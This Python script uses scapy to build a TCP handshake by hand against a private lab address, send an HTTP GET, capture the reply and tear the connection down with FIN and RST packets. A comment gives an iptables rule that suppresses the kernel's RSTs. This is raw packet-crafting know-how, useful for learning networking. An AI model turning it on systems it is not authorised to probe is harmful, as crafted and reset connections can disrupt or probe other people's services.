
 
import random

from scapy.all import *

'''
Note: Linux might send an RST in reply to the SYN/ACK for a forged SYN. Suppress that by executing:
#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
'''

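# Target endpoint and the forged client endpoint. Source port and ISN are
# randomised so repeated runs do not collide with a half-closed connection
# left over from a previous run.
dst = "192.168.56.1"
dport = 8080
sport = random.randint(1024,65535)
seq = random.randint(1, 50000)

# Seconds to wait for the SYN/ACK and for the HTTP response capture.
timeout = 5

pkt = IP(dst = dst)

# 3whs start

# SYN
pkt_syn = pkt/TCP(sport = sport, dport = dport, seq = seq, flags = 'S')

# SYN/ACK -- sr1() returns None when nothing answers before the timeout
# (host down, port closed with RST filtered, wrong interface), so stop here
# instead of dereferencing None below.
pkt_syn_ack = sr1(pkt_syn, timeout = timeout, verbose = 0)
if pkt_syn_ack is None or TCP not in pkt_syn_ack:
    raise SystemExit('No SYN/ACK received from {}:{}'.format(dst, dport))

# ACK
seq += 1
if pkt_syn_ack[TCP].ack != seq:
    # Non-fatal, as in the original: the peer acknowledged something other
    # than our ISN+1, which usually means a stale or unrelated segment.
    print('Bad ACK number !')

ack = pkt_syn_ack[TCP].seq + 1
pkt_ack = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'A')
send(pkt_ack)

# 3whs end

http_req = '\r\n'.join(['GET /index.html HTTP/1.1'
,'Host: {}'.format(dst)
,'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'
,'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
,'Accept-Language: en-US,en;q=0.5'
,'Accept-Encoding: gzip, deflate'
,'Connection: keep-alive'
,'\r\n'])

# Request length in bytes; it advances our sequence number for the FIN and RST.
req_len = len(http_req)

pkt_http_req = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'AP')/http_req
# The FIN occupies the sequence number immediately after the request payload.
pkt_fin_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + req_len, ack = ack, flags = 'AF')

# Send GET request
send(pkt_http_req)
# Send FIN/ACK just after GET request
send(pkt_fin_ack)

# Receive GET answer. The BPF filter pins the capture to this connection and
# lfilter skips empty segments (the peer typically ACKs the data/FIN before
# it sends the response body), so a bare ACK or a segment from another flow
# is not mistaken for the response.
# NOTE(review): the capture is started after send(), so a very fast response
# can still be missed; starting the capture before sending would close that
# window.
resp_filter = 'tcp and src host {} and src port {} and dst port {}'.format(dst, dport, sport)
pkt_http_resp = sniff(filter = resp_filter,
                      lfilter = lambda p: TCP in p and len(p[TCP].payload) > 0,
                      count = 1, timeout = timeout)
if not pkt_http_resp:
    raise SystemExit('No HTTP response received from {}:{}'.format(dst, dport))

# Take the payload from the TCP layer rather than slicing a fixed 40 bytes off
# the IP packet, which is wrong as soon as the peer sends TCP options.
http_resp = str(pkt_http_resp[0][TCP].payload)
print(http_resp)

# Send RST/ACK after response: seq is past our FIN, ack covers the received
# response bytes.
pkt_rst_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + req_len + 1, ack = ack + len(http_resp), flags = 'AR')
send(pkt_rst_ack)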